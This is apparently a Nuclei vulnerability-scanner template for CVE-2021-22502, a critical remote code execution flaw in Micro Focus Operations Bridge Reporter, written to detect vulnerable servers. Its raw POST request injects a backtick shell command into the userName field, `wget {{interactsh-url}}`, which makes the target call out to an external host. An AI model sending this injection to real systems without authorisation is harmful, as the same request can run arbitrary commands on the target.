59 lines
1.7 KiB
YAML
59 lines
1.7 KiB
YAML
id: CVE-2021-22502
|
|
|
|
info:
|
|
name: Micro Focus Operations Bridge Reporter - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: |
|
|
Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
|
|
reference:
|
|
- https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
|
|
- https://softwaresupport.softwaregrp.com/doc/KM03775947
|
|
- https://www.zerodayinitiative.com/advisories/ZDI-21-153/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22502
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-22502
|
|
cwe-id: CWE-78
|
|
cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:*:*:*:*:*:*:*:*
|
|
epss-score: 0.97358
|
|
tags: cve,cve2021,microfocus,obr,rce,kev
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /AdminService/urest/v1/LogonResource HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "An error occurred"
|
|
- "AUTHENTICATION_FAILED"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 401
|
|
|
|
# Enhanced by md on 2023/04/12
|